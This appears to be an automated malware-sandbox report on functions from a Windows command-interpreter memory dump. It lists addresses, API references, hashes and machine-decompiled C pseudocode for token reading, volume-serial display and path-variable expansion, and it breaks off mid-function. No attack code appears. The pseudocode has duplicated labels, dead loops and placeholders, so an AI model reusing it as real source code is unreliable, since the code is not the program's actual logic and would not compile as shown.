0x4a737715
0x4a735273
0x4a735279
0x4a73527c
0x4a735281
0x4a7351ba
0x4a7351ba
0x4a7351ba
0x00000000
0x4a735281
0x4a73771b
0x4a73771b
0x4a73771f
0x4a7351b2
0x4a7351b4
0x00000000
0x00000000
0x00000000
0x4a7351b4
0x4a737725
0x4a737725
0x4a73772b
0x4a73f3dc
0x4a73f3dc
0x4a7378d6
0x4a7378db
0x00000000
0x4a7378db
0x4a737731
0x4a737733
0x4a73773f
0x4a737745
0x4a746cc3
0x4a746cc3
0x4a746cca
0x4a746d10
0x4a746d10
0x00000000
0x4a746d10
0x4a746ccc
0x4a746ce4
0x4a746cea
0x4a746cf0
0x4a746cf2
0x00000000
0x00000000
0x4a746cf4
0x4a746cf4
0x4a746cfb
0x4a746d01
0x4a746d01
0x00000000
0x4a73774b
0x4a737761
0x4a737767
0x4a737771
0x4a73777f
0x4a737793
0x4a737797
0x4a73779d
0x4a73779f
0x4a746d23
0x4a7377a5
0x4a7377a5
0x4a7377a5
0x4a7377a5
0x4a7377a5
0x4a7377ac
0x4a7377b3
0x00000000
0x4a7377b9
0x4a7377b9
0x4a7377c1
0x4a7377cf
0x4a7377dd
0x4a7377dd
0x4a7377e2
0x4a7377e8
0x4a7377ee
0x4a7377f3
0x4a746d2e
0x4a746d3e
0x4a746d44
0x4a746d46
0x00000000
0x00000000
0x4a746d4c
0x4a746d4c
0x4a746d56
0x4a746d93
0x4a746d93
0x4a746d9d
0x4a746db1
0x4a746dbc
0x4a746dbe
0x4a746dcc
0x4a746dce
0x4a746dd2
0x4a746dd3
0x4a746dd7
0x4a746dd7
0x4a746dd7
0x4a746dce
0x4a746dfd
0x4a746e06
0x4a746e08
0x4a746e16
0x4a746e1b
0x4a746e1f
0x4a746e20
0x4a746e24
0x4a746e24
0x4a746e24
0x4a746e1b
0x4a746e31
0x4a746e43
0x4a746e46
0x4a746e46
0x4a746e4b
0x4a746e55
0x4a746e61
0x4a746e63
0x4a746e71
0x4a746e73
0x4a746e77
0x4a746e78
0x4a746e7c
0x4a746e7c
0x4a746e7c
0x4a746e73
0x4a746e83
0x4a746e8f
0x4a746eb7
0x4a746eb7
0x00000000
0x4a746e55
0x4a746d58
0x4a746d58
0x4a746d5a
0x4a746d61
0x00000000
0x00000000
0x4a746d63
0x4a746d63
0x4a746d68
0x4a746d68
0x4a746d6a
0x4a746d6c
0x4a746d6e
0x00000000
0x00000000
0x4a746d70
0x4a746d70
0x4a746d76
0x4a746d79
0x4a746d82
0x4a746d7b
0x4a746d7b
0x4a746d7b
0x4a746d83
0x4a746d87
0x4a746d89
0x4a746d8c
0x4a746d8d
0x4a746d91
0x00000000
0x00000000
0x00000000
0x00000000
0x4a746d91
0x00000000
0x4a746d68
0x4a7377f9
0x4a7377f9
0x4a7377ff
0x4a737804
0x4a746ebf
0x4a746ebf
0x4a746ec6
0x00000000
0x00000000
0x4a746ecc
0x4a7378cf
0x4a7378d5
0x00000000
0x4a7378d5
0x4a73780a
0x4a737810
0x4a737812
0x4a746ed3
0x4a746edd
0x4a746edf
0x4a746ee7
0x4a746ee8
0x4a746eec
0x4a746eec
0x4a746edf
0x4a737818
0x4a73781a
0x4a7378b3
0x4a7378c6
0x4a7378ca
0x00000000
0x4a737820
0x4a737820
0x4a737820
0x4a737827
0x4a742389
0x4a742389
0x4a74238b
0x00000000
0x00000000
0x4a742391
0x00000000
0x4a742391
0x4a73782d
0x4a73782d
0x4a737833
0x4a737835
0x4a737842
0x4a737847
0x4a737847
0x4a737847
0x4a73784e
0x4a73784e
0x4a737854
0x4a737854
0x4a73785b
0x4a737871
0x4a737875
0x4a73787a
0x4a73787a
0x4a737880
0x4a737888
0x4a737890
0x4a737892
0x4a73fea7
0x4a73fead
0x4a73fead
0x4a737898
0x4a73789f
0x4a7378a1
0x4a7378a3
0x4a7378a3
0x4a7378a6
0x4a7378ad
0x4a737977
0x4a737977
0x00000000
0x4a7378ad
0x4a73781a
0x4a7377b3
0x4a737745
0x4a7376ec
0x4a7376ec
0x4a7376f0
0x4a736c46
0x4a736c4f
0x4a736c51
0x4a736c53
0x4a746c49
0x4a746c49
0x4a746c50
0x00000000
0x00000000
0x4a746c52
0x00000000
0x4a736c59
0x4a736c5a
0x4a736c5f
0x4a736c63
0x4a736c6b
0x4a736c6b
0x00000000
0x4a736c63
0x4a736c53
0x4a7376f6
0x4a7376f6
0x4a7376fa
0x4a737922
0x4a737927
0x4a737929
0x4a73792f
0x4a737935
0x4a73793b
0x4a737942
0x4a737948
0x4a73794e
0x4a737954
0x4a737954
0x4a73794e
0x4a737942
0x4a737935
0x4a737929
0x00000000
0x4a7376fa
0x4a73769f
0x4a73769f
0x4a7376a3
0x4a746c12
0x4a746c13
0x4a746c17
0x4a746c23
0x4a746c26
0x4a746c27
0x4a746c29
0x00000000
0x00000000
0x4a746c2f
0x4a746c39
0x4a746c43
0x4a746c45
0x4a746c47
0x4a746c79
0x4a746c85
0x4a746c91
0x4a746c97
0x4a746c9c
0x4a746ca3
0x4a746ca5
0x4a746ca5
0x4a746ca5
0x4a746ca5
0x4a746cac
0x4a746cb3
0x4a746cb4
0x00000000
0x4a746cb4
0x00000000
0x4a746c47
0x4a7376a9
0x4a7376b0
0x4a7376b4
0x4a7376b6
0x00000000
0x00000000
0x00000000
0x4a7376b6

APIs

GetFullPathNameW.KERNEL32(00000000,00000208,?,?,00000000), ref: 4A73775B
wcsrchr.MSVCRT ref: 4A737793
memset.MSVCRT ref: 4A7377CF
wcsrchr.MSVCRT ref: 4A737888
longjmp.MSVCRT(00004002,000000FF,00000025,00000000,4A754AC0), ref: 4A746BC8

Strings

fdpnxsatz, xrefs: 4A737614

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: wcsrchr$FullNamePathlongjmpmemset
String ID: fdpnxsatz
API String ID: 878463284-1106894203
Opcode ID: d158c1d2a4fbba069be67ea3c1b07be02f10a2fdeb04320efb187a307d4bacb0
Instruction ID: b565c5b56ddc727cfeacd64d03ab98029acd54c2170f186330ff7fdeac18a719
Opcode Fuzzy Hash: d158c1d2a4fbba069be67ea3c1b07be02f10a2fdeb04320efb187a307d4bacb0
Instruction Fuzzy Hash: 67C1B2B1909629DADFB08B24CC847A97FF8FB44361F1281D9D589A6181DF319AC8CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 4A731D26, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E4A731D26(signed int __eax, long* _a4, intOrPtr _a8, signed int _a12) {
				long _v8;
				signed short* _v12;
				void* __ecx;
				signed int _t42;
				signed int _t43;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t55;
				long _t67;
				signed short _t71;
				void* _t75;
				void* _t81;
				signed int _t89;
				signed int _t97;
				long _t98;
				long _t99;
				long _t100;
				long* _t103;
				long* _t105;
				long* _t107;

				_t42 = __eax;
				_push(_t82);
				_push(0);
				_push(0x4a754ac0);
				L4A731BC7();
				if(__eax != 0) {
					L43:
					_t43 = _t42 | 0xffffffff;
					L17:
					return _t43;
				}
				_t103 = _a4;
				if(_t103 == 0) {
					if( *0x4a770658 != 0) {
						E4A7358F3(L"Ungetting: \'%s\'\n",  *0x4a754190);
					}
					_t45 =  *0x4a754190; // 0x0
					 *0x4a754194 = _t45;
					_t43 = 0;
					goto L17;
				}
				if(_a8 < 6) {
					goto L43;
				}
				_t46 =  *0x4a754194; // 0x0
				 *0x4a754190 = _t46;
				_v12 = _t103;
				if((_a12 & 0x00000021) != 0) {
					L10:
					if(E4A731F90( &_v8,  &_a12) != 0x100) {
						_a12 = _a12 | 0x00000040;
						 *_t103 = _v8;
						 *0x4a754198 =  *0x4a754198 & 0x00000000;
						_t105 =  &(_t103[0]);
						_t97 = _t105 - _v12 >> 1;
						while(1) {
							_a4 = _t105;
							if(E4A731F90( &_v8,  &_a12) == 0x100 || _t97 >= _a8 - 1) {
								break;
							}
							 *_t105 = _v8;
							_t105 =  &(_t105[0]);
							_t97 = _t97 + 1;
						}
						_a12 = _a12 & 0xffffffbf;
						 *_t105 = 0;
						_t55 = _a8;
						_t28 = _t55 - 1; // 0x5
						_t87 = _t28;
						if(_t97 < _t28) {
							_t55 = E4A731F77(_t55);
						}
						if(_t97 >= _t55) {
							if(_v8 == 0xffff) {
								goto L25;
							}
							_t42 = E4A736D44(_t87, 0x234f, 1, _v12);
							goto L43;
						} else {
							L25:
							_t43 = 0x4000;
							goto L17;
						}
					}
					_t98 = _v8;
					_t81 = 2;
					 *_t103 = _t98;
					_t107 =  &(_t103[0x40]);
					_a4 = _t107;
					if(iswdigit(_t98) != 0) {
						_t98 = E4A731E26() & 0x0000ffff;
						 *_t107 = _t98;
						_t107 =  &(_t107[0x40]);
						_v8 = _t98;
						_a4 = _t107;
					}
					if(_t98 == 0x7c || _t98 == 0x26 || _t98 == 0x3e || _t98 == 0x3c) {
						_t63 = E4A731E26() & 0x0000ffff;
						_v8 = _t63;
						_t30 = _t107 - 2; // 0x0
						if(_t63 ==  *_t30) {
							 *_t107 = _t63;
							_t107 = _t107 + _t81;
							_a4 = _t107;
							_t63 = E4A731E26() & 0x0000ffff;
							_v8 = _t63;
						}
						_t33 = _t107 - 2; // 0x0
						_t89 =  *_t33 & 0x0000ffff;
						if(_t89 != 0x3e) {
							if(_t89 != 0x3c) {
								goto L32;
							}
							goto L31;
						} else {
							L31:
							if(_t63 == 0x26) {
								_t67 = 0x26;
								 *_t107 = _t67;
								_t107 = _t107 + _t81;
								_a4 = _t107;
								do {
									_t99 = E4A731E26() & 0x0000ffff;
									_v8 = _t99;
								} while (iswspace(_t99) != 0 || E4A7318EB(?str?, _t99) != 0);
								if(iswdigit(_t99) != 0) {
									 *_t107 = _t99;
									_t107 = _t107 + _t81;
									_a4 = _t107;
									_t71 = E4A731E26();
									_t63 = _t71 & 0x0000ffff;
									_v8 = _t71 & 0x0000ffff;
								}
							}
							L32:
							E4A731F77(_t63);
							goto L16;
						}
					} else {
						L16:
						 *_t107 = 0;
						_t43 =  *_v12 & 0x0000ffff;
						goto L17;
					}
				} else {
					goto L4;
				}
				while(1) {
					L4:
					_t100 = E4A731E26() & 0x0000ffff;
					_v8 = _t100;
					if(iswspace(_t100) != 0 && _t100 != 0xa) {
						goto L6;
					} else {
						continue;
					}
					do {
						L4:
						_t100 = E4A731E26() & 0x0000ffff;
						_v8 = _t100;
					} while (iswspace(_t100) != 0 && _t100 != 0xa);
					L6:
					_t75 = 0x4a754672;
					if((_a12 & 0x00000004) == 0) {
						_t75 = 0x4a754670;
					}
					if(E4A7318EB(_t75, _t100) != 0) {
						if(_t100 == 0) {
							goto L9;
						}
						continue;
					} else {
						L9:
						E4A731F77(_t76);
						goto L10;
					}
				}
			}

0x4a731d26
0x4a731d2c
0x4a731d30
0x4a731d32
0x4a731d37
0x4a731d40
0x4a736804
0x4a736804
0x4a731e1a
0x4a731e1e
0x4a731e1e
0x4a731d46
0x4a731d4b
0x4a732af1
0x4a746fd2
0x4a746fd8
0x4a732af7
0x4a732afc
0x4a732b01
0x00000000
0x4a732b01
0x4a731d55
0x00000000
0x00000000
0x4a731d5f
0x4a731d64
0x4a731d69
0x4a731d6c
0x4a731daf
0x4a731dc3
0x4a7327fe
0x4a732802
0x4a732805
0x4a73280d
0x4a732813
0x4a732815
0x4a73281d
0x4a732827
0x00000000
0x00000000
0x4a732835
0x4a732839
0x4a73283a
0x4a73283a
0x4a73283d
0x4a732843
0x4a732846
0x4a732849
0x4a732849
0x4a73284e
0x4a732850
0x4a732850
0x4a732857
0x4a746fe7
0x00000000
0x00000000
0x4a746ff7
0x00000000
0x4a73285d
0x4a73285d
0x4a73285d
0x00000000
0x4a73285d
0x4a732857
0x4a731dc9
0x4a731dce
0x4a731dcf
0x4a731dd2
0x4a731dd5
0x4a731de1
0x4a734acc
0x4a734acf
0x4a734ad2
0x4a734ad4
0x4a734ad7
0x4a734ad7
0x4a731deb
0x4a733dbc
0x4a733dbf
0x4a733dc2
0x4a733dc6
0x4a733dc8
0x4a733dcb
0x4a733dcd
0x4a733dd5
0x4a733dd8
0x4a733dd8
0x4a733ddb
0x4a733ddb
0x4a733de3
0x4a7367f9
0x00000000
0x00000000
0x00000000
0x4a733de9
0x4a733de9
0x4a733ded
0x4a736371
0x4a736372
0x4a736375
0x4a736377
0x4a73637a
0x4a73637f
0x4a736383
0x4a73638d
0x4a7363aa
0x4a7363b0
0x4a7363b3
0x4a7363b5
0x4a7363b8
0x4a7363bd
0x4a7363c0
0x4a7363c0
0x4a7363aa
0x4a733df3
0x4a733df3
0x00000000
0x4a733df3
0x4a731e0f
0x4a731e0f
0x4a731e11
0x4a731e17
0x00000000
0x4a731e17
0x00000000
0x00000000
0x00000000
0x4a731d6e
0x4a731d6e
0x4a731d73
0x4a731d77
0x4a731d83
0x00000000
0x00000000
0x00000000
0x00000000
0x4a731d6e
0x4a731d6e
0x4a731d73
0x4a731d77
0x4a731d81
0x4a731d8b
0x4a731d8f
0x4a731d94
0x4a731d96
0x4a731d96
0x4a731da4
0x4a7357e4
0x00000000
0x00000000
0x00000000
0x4a731daa
0x4a731daa
0x4a731daa
0x00000000
0x4a731daa
0x4a731da4

APIs

_setjmp3.MSVCRT ref: 4A731D37
iswspace.MSVCRT ref: 4A731D7A
iswdigit.MSVCRT ref: 4A731DD8

Strings

Ungetting: '%s', xrefs: 4A746FCD
=,;, xrefs: 4A731D96, 4A731D9C, 4A736392

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _setjmp3iswdigitiswspace
String ID: =,;$Ungetting: '%s'
API String ID: 3355992209-942940122
Opcode ID: 74b95aba628bd9e11ae935d70b97dde7eebe7c83377f4fb08ef129c10f8d4849
Instruction ID: 8beaa3999675f323fd22f9386800c8c8c0b51474fab1be1eb1c869ec9208a52b
Opcode Fuzzy Hash: 74b95aba628bd9e11ae935d70b97dde7eebe7c83377f4fb08ef129c10f8d4849
Instruction Fuzzy Hash: EF61367195EA96EBDF708F64C8446EE7FB4EF053A1F13001AE944CB242E3708A89C351

Uniqueness

Uniqueness Score: -1.00%

Function 4A74E53B, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E4A74E53B(void* __edx, signed short _a4) {
				signed int _v8;
				intOrPtr _v12;
				short _v16;
				char _v272;
				short _v786;
				long _v800;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				short _t19;
				intOrPtr _t20;
				signed short _t21;
				void* _t28;
				int _t30;
				long _t31;
				signed short _t32;
				long _t51;
				void* _t55;
				void* _t58;
				void* _t60;
				void* _t63;
				long _t64;
				signed int _t66;

				_t63 = __edx;
				_t17 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t17 ^ _t66;
				_t19 =  *0x4a74e6d0; // 0x3a0020
				_t65 = _a4;
				_t64 =  *_t65 & 0x0000ffff;
				_v16 = _t19;
				_t20 =  *0x4a74e6d4; // 0x5c
				_v12 = _t20;
				if(_t64 != 0) {
					_t21 = _t65;
					_t63 = _t21 + 2;
					do {
						_t55 =  *_t21;
						_t21 = _t21 + 2;
					} while (_t55 != 0);
					if(_t21 - _t63 >> 1 != 2 ||  *((short*)(_t65 + 2)) != 0x3a) {
						L17:
						E4A7358F3();
						E4A736D44(_t55, 0xf, 0, 0x4a7545a8);
						goto L18;
					} else {
						_t30 = iswalpha(_t64);
						_pop(_t55);
						if(_t30 == 0) {
							goto L17;
						} else {
							_t31 =  *_t65 & 0x0000ffff;
							goto L8;
						}
					}
				} else {
					_t31 =  *0x4a755260 & 0x0000ffff;
					L8:
					_t32 = towupper(_t31);
					_pop(_t58);
					_t65 = _t32 & 0x0000ffff;
					_v16 = _t32 & 0x0000ffff;
					if(GetVolumeInformationW( &_v16,  &_v786, 0x101,  &_v800, 0, 0, 0, 0) != 0) {
						if(_v786 == 0) {
							E4A7399E1(_t58, 0x235e, 1, E4A739A2C(0x4a74e6c8, _t65 & 0x0000ffff));
						} else {
							_push( &_v786);
							E4A7399E1(_t58, 0x235f, 2, E4A739A2C(0x4a74e6c8, _t65 & 0x0000ffff));
						}
						_push(_v800 & 0x0000ffff);
						E4A73179D( &_v272, 0x80, L"%04X-%04X", _v800 >> 0x10);
						E4A7399E1(_v800 & 0x0000ffff, 0x235b, 1,  &_v272);
						_t28 = 0;
					} else {
						E4A7358F3();
						_t65 = GetLastError;
						_t60 = 0x4a7545a8;
						_t51 = GetLastError();
						_push(0);
						if(_t51 != 0x15) {
							_push(GetLastError());
						} else {
							_push(_t51);
						}
						E4A736D44(_t60);
						L18:
						_t28 = 1;
					}
				}
				return E4A7313A9(_t28, 0, _v8 ^ _t66, _t63, _t64, _t65);
			}

0x4a74e53b
0x4a74e546
0x4a74e54d
0x4a74e550
0x4a74e557
0x4a74e55b
0x4a74e55e
0x4a74e561
0x4a74e568
0x4a74e56e
0x4a74e579
0x4a74e57b
0x4a74e57e
0x4a74e57e
0x4a74e582
0x4a74e583
0x4a74e58f
0x4a74e69e
0x4a74e6a3
0x4a74e6ab
0x00000000
0x4a74e5a0
0x4a74e5a1
0x4a74e5a7
0x4a74e5aa
0x00000000
0x4a74e5b0
0x4a74e5b0
0x00000000
0x4a74e5b0
0x4a74e5aa
0x4a74e570
0x4a74e570
0x4a74e5b3
0x4a74e5b4
0x4a74e5ba
0x4a74e5be
0x4a74e5d9
0x4a74e5e5
0x4a74e619
0x4a74e658
0x4a74e61b
0x4a74e621
0x4a74e638
0x4a74e63d
0x4a74e669
0x4a74e67f
0x4a74e692
0x4a74e69a
0x4a74e5e7
0x4a74e5ec
0x4a74e5f1
0x4a74e5f7
0x4a74e5f8
0x4a74e5fa
0x4a74e5fe
0x4a74e605
0x4a74e600
0x4a74e600
0x4a74e600
0x4a74e606
0x4a74e6b3
0x4a74e6b5
0x4a74e6b5
0x4a74e5e5
0x4a74e6c4

APIs

iswalpha.MSVCRT ref: 4A74E5A1
towupper.MSVCRT ref: 4A74E5B4
GetVolumeInformationW.KERNEL32(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 4A74E5DD
GetLastError.KERNEL32 ref: 4A74E5F8
GetLastError.KERNEL32(00000000), ref: 4A74E603

Strings

%04X-%04X, xrefs: 4A74E66E
:\, xrefs: 4A74E550

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InformationVolumeiswalphatowupper
String ID: :\$%04X-%04X
API String ID: 930873262-3541097225
Opcode ID: 954d7425646fc790f7203355b735d3838be9e893b98c75718490b3e06be68e9e
Instruction ID: 5479123fb58f9202618def76ece3212f6adddb1a1d2dc5e1a2351b099ba1688b
Opcode Fuzzy Hash: 954d7425646fc790f7203355b735d3838be9e893b98c75718490b3e06be68e9e
Instruction Fuzzy Hash: C54127B2908128BEFB709BA4CD55DFB7BBCDB49320F414462F545DA082EA709E48CB71

Uniqueness

Uniqueness Score: -1.00%

Function 4A736C46, Relevance: 12.4, APIs: 8, Instructions: 353
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E4A736C46(signed int __ebx, signed int __edx, void* __edi, signed int __esi) {
				signed int _t169;
				signed int _t170;
				signed int _t173;
				WCHAR* _t174;
				long _t188;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t206;
				void* _t229;
				void* _t248;
				void* _t252;
				short* _t253;
				signed int _t256;
				signed int _t260;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				void* _t289;
				void* _t294;
				signed int _t321;
				signed int _t332;
				signed int _t336;
				WCHAR* _t339;
				void* _t340;
				void* _t341;
				WCHAR* _t342;
				signed int _t348;
				void* _t350;
				signed int _t357;
				signed int _t360;
				wchar_t* _t365;
				signed int _t367;
				void* _t369;

				L0:
				while(1) {
					L0:
					_t348 = __esi;
					_t334 = __edx;
					_t288 = __ebx;
					_t339 = E4A7319D6(__edi + 2);
					if(_t339 == 0) {
						goto L80;
					} else {
						__eax = E4A732ED1(__edi);
						__eflags =  *__eax - 0x22;
						if( *__eax == 0x22) {
							__ecx = 0;
							 *__eax = __cx;
						}
						break;
					}
					while(1) {
						L80:
						__eflags =  *(_t367 - 0x830);
						if( *(_t367 - 0x830) != 0) {
							goto L83;
						} else {
							break;
						}
						while(1) {
							L83:
							__imp__longjmp( *(_t367 - 0x830), 0xffffffff);
							while(1) {
								L73:
								 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004100;
								while(1) {
									L18:
									_t348 = _t348 + 2;
									_t169 =  *_t348 & 0x0000ffff;
									__eflags = _t169;
									if(_t169 == 0) {
										break;
									}
									L8:
									__eflags = _t169 - 0x24;
									if(_t169 == 0x24) {
										break;
									}
									L9:
									_t271 =  *_t339(L"fdpnxsatz",  *_t288(_t169) & 0x0000ffff);
									_t369 = _t369 + 0xc;
									__eflags = _t271;
									if(_t271 == 0) {
										break;
									}
									L10:
									_t273 =  *_t339( *((intOrPtr*)(_t367 - 0x840)),  *_t348 & 0x0000ffff);
									__eflags = _t273;
									if(_t273 != 0) {
										 *(_t367 - 0x848) = _t348;
										 *(_t367 - 0x834) =  *(_t367 - 0x828);
									}
									_t277 =  *_t288( *_t348 & 0x0000ffff) & 0x0000ffff;
									__eflags = _t277 - 0x70;
									_pop(_t294);
									if(__eflags > 0) {
										L59:
										_t278 = _t277 - 0x73;
										__eflags = _t278;
										if(_t278 == 0) {
											L77:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008020;
											continue;
										}
										L60:
										_t279 = _t278 - 1;
										__eflags = _t279;
										if(_t279 == 0) {
											L76:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004200;
											continue;
										}
										L61:
										_t280 = _t279 - 4;
										__eflags = _t280;
										if(_t280 != 0) {
											L74:
											__eflags = _t280 != 0;
											if(_t280 != 0) {
												goto L67;
											}
											L75:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004400;
											continue;
										}
										L62:
										 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008010;
										continue;
									} else {
										L12:
										if(__eflags == 0) {
											L57:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008004;
											continue;
										}
										L13:
										_t283 = _t277 - 0x61;
										__eflags = _t283;
										if(_t283 == 0) {
											L73:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004100;
											continue;
										}
										L14:
										_t284 = _t283 - 3;
										__eflags = _t284;
										if(_t284 == 0) {
											L56:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008002;
											continue;
										}
										L15:
										_t286 = _t284;
										__eflags = _t286;
										if(_t286 == 0) {
											L65:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008001;
											continue;
										}
										L16:
										__eflags = _t286 != 8;
										if(_t286 != 8) {
											L67:
											__eflags =  *(_t367 - 0x830);
											if( *(_t367 - 0x830) == 0) {
												L69:
												_t174 = 0;
												L3:
												_pop(_t340);
												_pop(_t350);
												_pop(_t289);
												return E4A7313A9(_t174, _t289,  *(_t367 - 4) ^ _t367, _t334, _t340, _t350);
											}
											L68:
											E4A736D44(_t294, 0x400023a8, 1,  *((intOrPtr*)(_t367 - 0x844)));
											_t369 = _t369 + 0xc;
											L83:
											__imp__longjmp( *(_t367 - 0x830), 0xffffffff);
											goto L73;
										} else {
											_t4 = _t367 - 0x828;
											 *_t4 =  *(_t367 - 0x828) | 0x00008008;
											__eflags =  *_t4;
											continue;
										}
									}
								}
								L19:
								_t170 =  *_t348 & 0x0000ffff;
								 *(_t367 - 0x838) =  *(_t367 - 0x838) & 0x00000000;
								__eflags = _t170;
								if(_t170 == 0) {
									L63:
									_t348 =  *(_t367 - 0x848);
									 *(_t367 - 0x828) =  *(_t367 - 0x834);
									L22:
									_t173 =  *_t339( *((intOrPtr*)(_t367 - 0x840)),  *_t348 & 0x0000ffff);
									_pop(_t294);
									__eflags = _t173;
									if(_t173 == 0) {
										goto L67;
									}
									L23:
									_t339 =  *( *(_t367 - 0x83c) + (_t173 -  *((intOrPtr*)(_t367 - 0x840)) >> 1) * 4);
									__eflags = _t339;
									if(_t339 == 0) {
										goto L26;
									}
									L24:
									__eflags =  *_t339 - 0x22;
									if( *_t339 == 0x22) {
										goto L0;
									}
									L25:
									__eflags =  *_t348 - 0x30;
									if( *_t348 == 0x30) {
										_t260 =  *0x4a7540b4; // 0x0
										__eflags = _t260;
										if(_t260 != 0) {
											__eflags =  *((intOrPtr*)(_t260 + 0x8c)) - _t339;
											if( *((intOrPtr*)(_t260 + 0x8c)) == _t339) {
												__eflags =  *(_t367 - 0x838);
												if( *(_t367 - 0x838) == 0) {
													__eflags =  *(_t367 - 0x828) & 0x0000c000;
													if(( *(_t367 - 0x828) & 0x0000c000) != 0) {
														_t339 =  *_t260;
													}
												}
											}
										}
									}
									goto L26;
								}
								L20:
								__eflags = _t170 - 0x24;
								if(_t170 == 0x24) {
									L78:
									_t365 = _t348 + 2;
									 *(_t367 - 0x834) = _t365;
									_t348 = wcschr(_t365, 0x3a);
									_pop(_t294);
									__eflags = _t348;
									if(_t348 == 0) {
										goto L67;
									}
									L79:
									_t339 = (_t348 -  *(_t367 - 0x834) >> 1) + 1;
									_t288 = E4A731896(_t339 + _t339);
									__eflags = _t288;
									if(_t288 != 0) {
										L84:
										E4A734B3D(_t288, _t339,  *(_t367 - 0x834), _t339 - 1);
										 *(_t367 - 0x838) = E4A73321B(_t294, _t288);
										E4A73142E(_t288);
										__eflags =  *(_t367 - 0x838);
										if( *(_t367 - 0x838) == 0) {
											_t113 = _t367 - 0x838;
											 *_t113 =  *(_t367 - 0x838) | 0xffffffff;
											__eflags =  *_t113;
										}
										_t339 = wcsrchr;
										_t348 = _t348 + 2;
										 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008000;
										goto L22;
									}
									goto L80;
								}
								L21:
								_t268 =  *_t339( *((intOrPtr*)(_t367 - 0x840)), _t170);
								__eflags = _t268;
								if(_t268 == 0) {
									goto L63;
								}
								goto L22;
							}
						}
					}
					L81:
					goto L69;
				}
				L26:
				 *( *(_t367 - 0x84c)) = (_t348 -  *((intOrPtr*)(_t367 - 0x844)) + 2 >> 1) - 1;
				__eflags = _t339;
				if(_t339 == 0) {
					L4:
					__eflags =  *( *(_t367 - 0x84c));
					_t174 = E4A733AFC;
					if( *( *(_t367 - 0x84c)) == 0) {
						L2:
						_t174 = _t339;
					} else {
					}
					goto L3;
				}
				__eflags =  *_t339;
				if( *_t339 == 0) {
					L1:
					if(_t339 == 0) {
						goto L4;
					}
					goto L2;
				}
				__eflags =  *(_t367 - 0x828) & 0x0000c000;
				if(( *(_t367 - 0x828) & 0x0000c000) == 0) {
					_push(_t339);
					L49:
					_t339 = E4A7319D6();
					goto L1;
				}
				 *(_t367 - 0x824) = 0;
				__eflags =  *(_t367 - 0x838);
				if( *(_t367 - 0x838) != 0) {
					__eflags =  *(_t367 - 0x838) - 0xffffffff;
					if( *(_t367 - 0x838) == 0xffffffff) {
						L91:
						_t339 = 0;
						goto L31;
					}
					_t256 = SearchPathW( *(_t367 - 0x838), _t339, 0, 0x208, _t367 - 0x824, _t367 - 0x82c);
					 *(_t367 - 0x850) = _t256;
					__eflags = _t256;
					if(_t256 == 0) {
						goto L91;
					}
					__eflags =  *(_t367 - 0x828);
					if( *(_t367 - 0x828) == 0) {
						 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008001;
					}
					goto L31;
				} else {
					 *(_t367 - 0x850) = GetFullPathNameW(_t339, 0x208, _t367 - 0x824, _t367 - 0x82c);
					L31:
					 *(_t367 - 0x834) =  *(_t367 - 0x828) & 0x00000020;
					E4A736E47(_t367 - 0x824, 0x208,  *(_t367 - 0x828) & 0x00000020);
					_t188 = wcsrchr(_t367 - 0x824, 0x5c);
					 *(_t367 - 0x82c) = _t188;
					__eflags = _t188;
					if(_t188 == 0) {
						 *(_t367 - 0x82c) = wcsrchr(_t367 - 0x824, _t188);
					} else {
						_t29 = _t367 - 0x82c;
						 *_t29 =  &(( *(_t367 - 0x82c))[0]);
						__eflags =  *_t29;
					}
					__eflags =  *(_t367 - 0x850);
					if( *(_t367 - 0x850) == 0) {
						goto L1;
					} else {
						 *(_t367 - 0x414) = 0;
						memset(_t367 - 0x412, 0, 0x40e);
						_t195 =  *(_t367 - 0x828) & 0x00004000;
						__eflags = _t195;
						_t357 = _t367 - 0x414;
						 *(_t367 - 0x83c) = _t195;
						_t341 = 0x207;
						if(_t195 != 0) {
							_t198 = GetFileAttributesExW(_t367 - 0x824, 0, _t367 - 0x878);
							__eflags = _t198;
							if(_t198 == 0) {
								goto L35;
							}
							__eflags =  *(_t367 - 0x828) & 0x00000100;
							if(( *(_t367 - 0x828) & 0x00000100) == 0) {
								L102:
								__eflags =  *(_t367 - 0x828) & 0x00000200;
								if(( *(_t367 - 0x828) & 0x00000200) != 0) {
									E4A742513(_t367 - 0x864, _t367 - 0x89c);
									__eflags = _t357 - _t367 - 0x414;
									if(_t357 != _t367 - 0x414) {
										__eflags = _t357 - _t367 - 0x414 >> 1 - _t341;
